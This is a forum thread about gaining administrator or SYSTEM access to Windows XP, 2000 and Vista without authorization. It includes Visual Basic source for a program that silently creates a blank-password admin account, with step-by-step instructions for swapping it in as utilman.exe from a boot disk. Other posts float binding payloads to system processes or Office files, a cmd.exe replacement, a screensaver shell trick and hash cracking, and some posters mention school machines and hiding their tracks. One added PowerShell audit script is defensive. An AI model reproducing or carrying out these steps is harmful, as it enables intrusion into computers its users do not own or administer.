
Gain SYSTEM/Administrative Access to Windows XP/2000


celltoolz

Recommended Posts

  • 5 weeks later...

For a while I have had the idea to modify the XML of my launch pad. What I intend to do is modify the code so that it has a button that will run the script to add a new admin. I have previously made a u3p install file of the script compiled as utilman. It is hit or miss as to whether or not the prog will add an account that is a full admin. Logged on as admin it adds a user that is a member of both user and admin. Logged on as a restricted user it sometimes works, adding a new restricted user.

Today I am going to start trying to inject the script into the XML of my launch pad.... Preferably I would like to have a new version of the "u3accessgrant" compiled with the script tacked onto it.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
  <assemblyIdentity version="1.0.0.0"
     processorArchitecture="X86"
     name="U3LauncherInstallBase.exe"
     type="win32"/> 

  <description>Installs the U3Launcher</description> 
  <!-- Identify the application security requirements. -->
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel
          level="requireAdministrator"
          uiAccess="false"/>
        </requestedPrivileges>
       </security>
  </trustInfo>
</assembly>


  • 5 weeks later...

LOL, it's been so long since I started this thread... I just can't believe it's still going. And by the way, I'm still stoned HAHAHA......... :lol:

We still need to find a way to gain access while logged in as Guest or a lower privileged user. The only way I could think of doing so is by exploiting a system process that already has Administrator or System level privileges. Or I've heard that the Windows API is a very exploitable place, but that's all I'm gonna say cause we just can't give out all our secrets now, can we? B)


  • 1 month later...

Couldn't you replace the SAM file to change the hash? This causes a different password, or has Windows totally locked that out of possibilities? BTW utilman.exe runs even if the computer is locked.

******EDIT*******

I heard of someone using a Linux Live CD and copying cmd.exe and renaming it utilman.exe, then Ctrl + U, then just type in explorer.exe, and there was a video of it and it worked.


  • 1 month later...

I just noticed this topic... there are some interesting ideas.... however there are a few problems. Everyone that should know, knows how easy it is to add an administrator account with rebooting, using a Linux distro or some other UBCD method. What I'd like to know is if you are a normal user on a system, can you add a new administrator account without rebooting and on a system that has a password on the administrator account?

Reading through this topic I've found some common problems with people's "methods".

1. The at command hack is only going to work on some systems that don't have it locked out.

2. Rebooting is just not an option.

3. Other ways involve adding a user to a system that doesn't have an admin password.

4. cmd.exe is usually used... some systems may have this locked out as well.

So what I'd like to see is something that works on a locked down system. Without rebooting.

The key to this is going to be modifying some process or service that runs as system.

Replacing it with a hacked version of the .exe or even possibly infecting a .dll file that gets loaded by a system .exe. This also needs to be done without rebooting and without any admin access.

Having access to executables on a thumb drive is permitted. If this could be bound to a .doc or .pps or some other Office format, that would be cool too.

So this is my challenge to all yall's.


So my concept here is taking a payload that adds a new user with custom password, binding that to a critical system process. Then killing the process forcing windows to restart the process with the new hacked program bound to the original exe.

The concept should be easy enough; the trick is finding what exe or dll can be used when not the administrator and how to kill it > infect it > restart it.

The killing should be easy enough with an external program like pskill or another process killer program.

The infection process basically consists of writing a vbs or bat or AutoIT script to add a user with admin privs, then binding it to some .exe with UPX or some other exe binder.

Windows should take care of the automatic restart of the process or some application that a user has access to can have the payload attached.


Hi guys,

I'm pretty new here and I'm from the Netherlands, so excuse me if my English isn't that good.

I tried a few things to modify utilman.exe (it isn't switched off at my school). First I tried to boot a live Linux USB; this worked because USB boot was enabled in the BIOS (standard configuration). But when I tried to edit the utilman.exe I got the message that I could not change the permissions. How is this possible?

I realise I'm a newbie :P, but I hope you guys can help me...


  • 1 month later...

Well you have to have it from an admin permission sys exe. You can't edit sys files, they're usually locked. Memory is usually scanned by anti-virus for malicious code, but what about virtual memory, the hard drive? All you would have to do is fill up the RAM to get an admin permission exe into virtual memory, then add the bits and bytes. Think it would work?


  • 1 month later...

There is a Linux NTFS project up on the web you guys might want to read into it. This seems like a crazy idea but it would be cool to see if it would work on any PC without sending out a few red flags that something had been altered.

Here's a link to the Linux NTFS wiki >>> Linux NTFS wiki

Quick note from the people @ ntfs-3g.org

Linux: Make sure you have the basic development tools and the kernel includes the FUSE kernel module.

Please note that NTFS-3G doesn't require the FUSE user space package and it doesn't need to be installed.


  • 2 weeks later...

I've used the Offline NT PW & Reg editor numerous times to gain admin access to machines for work when the user has forgotten the P/W.

As long as you have a clean shutdown of Windows, Linux doesn't have any major issues writing to NTFS.

I don't know if it still works but alternatively you can set the screensaver to point to the command.com in the registry. Wait for the screensaver to appear on the login screen and boom, a shell.

Hello btw - I'm new.


Use program: dellater.exe to delete the targeted file upon the next boot. The command "dellater.exe" must be in the folder of the targeted file. Use CMD to execute the action.

:rolleyes:

OK here it is. Please post some input on what you think. Also I'm trying to figure out a better way to gain access to the NTFS partition. Any input welcomed!

Gain SYSTEM/Administrative Access to Windows XP/2000

I will explain how to gain local Administrative rights to a Windows XP/2000 computer without removing or cracking a user's password. In order for this to work the computer must have a CD-ROM drive, or other bootable device other than a hard drive.

(I'm stoned and it's 3:15 a.m., so I hope this makes sense)

Overview:

Windows XP/2000 allows you to run a program with System level privileges before logging on. The name of the program is Utility Manager. It is located at C:\Windows\system32\utilman.exe for Windows XP and C:\WINNT\System32\utilman.exe for Windows 2000. So all you have to do is make your own program that creates an administrative account. The program that you create has to have a filename of Utilman.exe in order to work.

If the filesystem on the computer is FAT32 then this process is very simple and only takes a second. If the computer uses the NTFS filesystem this will take a few minutes depending on how fast the PC is.

First we need to make the program

I used Visual Basic 6; here is my source code that I used to create the administrative account:

'#################################START###############################
Private Sub Form_Load()
    ' Create the account with an empty password ("""""" yields a literal "" on the command line)
    Shell "net user NewAdmin " & """""" & " /add", vbHide
    Pause 1
    ' Put the new account into the local Administrators group
    Shell "net localgroup administrators NewAdmin /add", vbHide
    Pause 1
    MsgBox "Added Administrative User", 16, "Hacked XP"
    End
End Sub

Sub Pause(interval)
    ' Pauses execution for the given number of seconds while keeping the message loop alive,
    ' so the asynchronous Shell call above has time to finish before the next command runs
    Dim Current
    Current = Timer
    Do While Timer - Current < Val(interval)
        DoEvents
    Loop
End Sub
'#################################END###############################

Compile this with the filename Utilman.exe; this is very important! What this program does is create a user named NewAdmin with a blank password and then add them to the Administrators group.

Ok, now that we've made the program, let's move on...

FAT32

1. Create a bootable floppy :: http://1gighost.net/keywest/boot98sc.exe

2. Add the newly made Utilman.exe to the floppy

3. Restart the computer with the floppy in it

4. After DOS loads, type C: and press Enter.

5. If it changes from A:\> to C:\> then you're doing good

6. Use this command: Copy A:\utilman.exe C:\windows\system32\utilman.exe and press Y to overwrite the existing file

7. Restart the computer without the floppy in it

8. When it gets to the login screen, press the Windows Key + U

9. Restart the computer if Fast User Switching is enabled (the graphical login with the picture next to the login name, XP only); if not enabled, skip to step 10

9a. After restarting you should see a new user in the list named NewAdmin. Click on this account and you just gained Administrative access to your PC.

10. After pressing Windows Key + U, type in the username NewAdmin and push Enter. That's it, you now have administrative access to your PC.

NTFS

Use a Windows 2000 Setup CD to gain access to the NTFS partition through the Recovery Console. From the Recovery Console you can copy over the hacked Utilman.exe. Once in the Recovery Console, follow the same instructions as above from step 6. After copying over the file, restart your computer by typing exit or pushing ALT CTRL DEL. Remove the Windows 2000 CD. When Windows loads to the choose user screen, simply push Windows Key + U. After pushing the Windows Key + U you should see a message that says "Added Administrative User"; restart the computer one last time, then choose the NewAdmin user account. This will have Administrative privileges. It works, I've done it, and I hope you all enjoy this nice little hack ! ! ! (If you're trying to gain SYSTEM level access you can replace the UTILMAN.exe to open a Command Prompt)

LOL I hope that made sense

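A defender-side check, added here and not part of any post in this thread: it flags System32 accessibility binaries that are no longer Microsoft-signed, that are byte-identical to cmd.exe (the renamed-cmd.exe trick mentioned earlier in the thread), or whose embedded OriginalFilename does not match their on-disk name. The thread only discusses utilman.exe and magnify.exe; sethc.exe, osk.exe and narrator.exe are included on the assumption that the same logon-screen launch path, and therefore the same check, applies to them.

```powershell
# Added example (not from the thread): audit the logon-screen accessibility binaries
# for the replacement described above. Run from an elevated PowerShell 4+ session.
$system32 = Join-Path $env:SystemRoot 'System32'
$cmdHash  = (Get-FileHash -Algorithm SHA256 -Path (Join-Path $system32 'cmd.exe')).Hash

# utilman.exe and magnify.exe are the names used in the thread; the other three are
# assumed to be launchable from the logon screen in the same way.
$targets = 'utilman.exe', 'magnify.exe', 'sethc.exe', 'osk.exe', 'narrator.exe'

foreach ($name in $targets) {
    $path = Join-Path $system32 $name
    if (-not (Test-Path -Path $path)) { continue }

    $sig  = Get-AuthenticodeSignature -FilePath $path
    $hash = (Get-FileHash -Algorithm SHA256 -Path $path).Hash
    $ver  = (Get-Item -Path $path).VersionInfo
    $findings = @()

    # 1. Signature: a custom VB6 build or any third-party binder output is unsigned.
    #    On older systems these files are catalog-signed and may report NotSigned even
    #    when untouched, so treat this as a prompt to investigate, not proof by itself.
    if ($sig.Status -ne 'Valid') {
        $findings += "signature status is $($sig.Status)"
    } elseif ($sig.SignerCertificate.Subject -notmatch 'Microsoft') {
        $findings += "signed by $($sig.SignerCertificate.Subject)"
    }

    # 2. Renamed shell: a copy of cmd.exe has exactly the same hash as cmd.exe.
    if ($hash -eq $cmdHash) {
        $findings += 'byte-identical to cmd.exe (renamed shell)'
    }

    # 3. Version resource: Microsoft's binaries carry their own name in OriginalFilename;
    #    a renamed cmd.exe still says CMD.EXE, and a VB6 build says whatever the author set.
    if ($ver.OriginalFilename -and $ver.OriginalFilename -ne $name) {
        $findings += "OriginalFilename is '$($ver.OriginalFilename)'"
    }

    if ($findings.Count -gt 0) {
        Write-Warning ("{0}: {1}" -f $name, ($findings -join '; '))
    } else {
        Write-Output ("{0}: OK  SHA256={1}" -f $name, $hash)
    }
}
```

Because the replacement in this thread is done from a boot CD while Windows is off, the check only catches it after the fact; restricting boot devices in firmware and encrypting the system volume are what prevent the offline copy in the first place.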

  • 2 weeks later...

the link to the compiled version of utilman.exe is down.

Since the original post was made a long time ago, does the method still work on XP Professional SP3?

edit:

@C-S-B

from Offline NT pw & reg-editor website

"DANGER WILL ROBINSON!

If used on users that have EFS encrypted files, and the system is XP or Vista, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again. If you don't know if you have encrypted files or not, you most likely don't have them. (except maybe on corporate systems) "

That is exactly a situation I would like to avoid.

any other solutions?

thanks a bunch

at


> Do you actually have encrypted files? Not many users do, never had a prob with this tool.

You have got a point there. But with that method you reset the admin password to gain system access.

There is no possibility to restore the system to its original state (original admin password). So you leave the system modified in order to gain admin access, and leave tracks behind.

It's a good method to reset the admin password nonetheless.

---edit:

Ophcrack worked great for cracking the hash.

thanks for the help though.


> You have got a point there. But with that method you reset the admin password to gain system access.
>
> There is no possibility to restore the system to its original state (original admin password). So you leave the system modified in order to gain admin access, and leave tracks behind.
>
> It's a good method to reset the admin password nonetheless.
>
> ---edit:
>
> Ophcrack worked great for cracking the hash.
>
> thanks for the help though.

So you're not supposed to be accessing the system?

Naughty...


I'm doing a little work on this. So far I've tested it and "MagniFy" (I guess that's what I'm gonna call it) works with SP3. I'm about to do a test with Vista. I'll let ya'll know how it goes and also post a link for an EXE of Utilman.exe (actually changed to Magnify.exe)

-Cell Toolz


Ok so I stayed up for a bit and found out that I can get it to work for Vista. I like it a lot better now. I'm gonna be updating this more often nowadays because I finally got a new computer and can start "hackin" again. Well anyways, here's the newest Administrative/System Access Program, renamed from utilman.exe to MagniFy.exe.

There are instructions in the ZIP file and also the VB source. Any questions or comments, let me know.

Download Link:

http://dc117.2shared.com/download/4673450/...104749-183cb98d


  • 2 weeks later...
